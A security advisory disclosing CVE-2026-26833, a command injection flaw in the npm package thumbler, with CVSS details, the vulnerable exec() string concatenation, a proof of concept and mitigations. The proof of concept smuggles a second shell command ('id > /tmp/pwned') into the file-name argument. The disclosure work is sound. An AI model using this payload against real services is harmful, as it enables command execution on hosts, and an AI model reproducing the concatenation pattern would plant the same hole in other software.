# CVE-2026-26833: OS command injection in thumbler

## Summary

`thumbler` through version `1.1.2` allows OS command injection in
`thumbnail()` in `lib/thumbler.js`. The package concatenates the
`input`, `output`, `time`, and `size` values into a single `ffmpeg`
command string and executes that string with `child_process.exec()`.
An attacker who controls one of those values can inject shell syntax
and run arbitrary commands.

## Affected product

| Product | Affected versions | Fixed version |
| --- | --- | --- |
| thumbler | all versions through 1.1.2 | no fix available as of 2026-03-24 |

## Vulnerability details

- CVE ID: `CVE-2026-26833`
- CWE: `CWE-78` - OS Command Injection
- CVSS 3.1: `9.8` (`Critical`)
- Vector: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
- Affected component: `lib/thumbler.js`, `thumbnail()`

The vulnerable code path constructs the following shell string:

```js
exec(
  'ffmpeg -ss ' + time + ' -i "' + input + '" -vframes 1 -s ' +
  size + ' "' + output + '"',
  ...
);
```

Because the command is assembled as a string, each attacker-controlled
field is a possible injection point.

## Technical impact

Any service that generates thumbnails from user-controlled media can
end up executing commands on the host while calling `thumbnail()`.

## Proof of concept

```js
require("thumbler").thumbnail(
  'test.mp4"; id > /tmp/pwned; echo "',
  "/tmp/out.jpg",
  {},
  () => {}
);
```

## Mitigation

No fixed npm release is available at the time of writing.

If you still depend on this package:

1. Do not pass untrusted data into `thumbnail()`.
2. Replace shell-string concatenation with argument-safe process
   execution.
3. Move to a maintained thumbnail generation library or a fixed fork.

## References

- https://www.npmjs.com/package/thumbler
- https://github.com/mmahrous/thumbler
- https://github.com/mmahrous/thumbler/blob/master/lib/thumbler.js